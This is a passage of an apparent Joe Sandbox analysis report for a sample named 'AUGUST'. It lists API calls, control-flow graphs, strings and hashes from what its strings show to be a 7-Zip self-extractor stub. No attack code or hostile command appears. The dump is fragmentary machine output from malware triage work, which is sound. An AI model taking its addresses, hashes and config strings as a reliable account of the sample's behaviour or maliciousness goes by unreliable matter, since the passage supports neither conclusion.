                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                            • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                            • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                            • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                          • wsprintfW.USER32 ref: 00405595
                                          • _wtol.MSVCRT ref: 004057DE
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                          • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                          • CoInitialize.OLE32(00000000), ref: 004059E9
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                          • GetKeyState.USER32(00000010), ref: 00405AA1
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                          • memset.MSVCRT ref: 004060AE
                                          • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                          • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                            • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                            • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                            • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                            • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                            • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                          • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                          • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                          • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                          • _wtol.MSVCRT ref: 00405F65
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                          • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                          • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                          • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                          • API String ID: 154539431-3058303289
                                          • Opcode ID: 3447839d119719d05016a7f05a564b7be075a38f3dc1eabf80374ede3987d6c4
                                          • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                          • Opcode Fuzzy Hash: 3447839d119719d05016a7f05a564b7be075a38f3dc1eabf80374ede3987d6c4
                                          • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D
                                          Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017eb call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 710->697 716 4017f1-4017f3 710->716 715 401804-401809 711->715 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                                          • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                          • Opcode Fuzzy Hash: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                                          • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58
                                          Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                          • SetLastError.KERNEL32(00000010), ref: 0040303D
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 1799206407-0
                                          • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                          • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                          • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                          • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                          Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                          • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: DiskFreeMessageSendSpace
                                          • String ID:
                                          • API String ID: 696007252-0
                                          • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                          • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                          • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                          • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D
                                          Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                          • String ID: HpA
                                          • API String ID: 801014965-2938899866
                                          • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                          • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                          • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                          • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58
                                          Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                          • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                          • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                          • DispatchMessageW.USER32(?), ref: 00401B89
                                          • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                          • String ID: Static
                                          • API String ID: 2479445380-2272013587
                                          • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                          • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                          • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                          • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9
                                          Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                          APIs
                                          • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                          • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@memcpymemmove
                                          • String ID:
                                          • API String ID: 3549172513-3916222277
                                          • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                          • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                          • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                          • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D
                                          Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
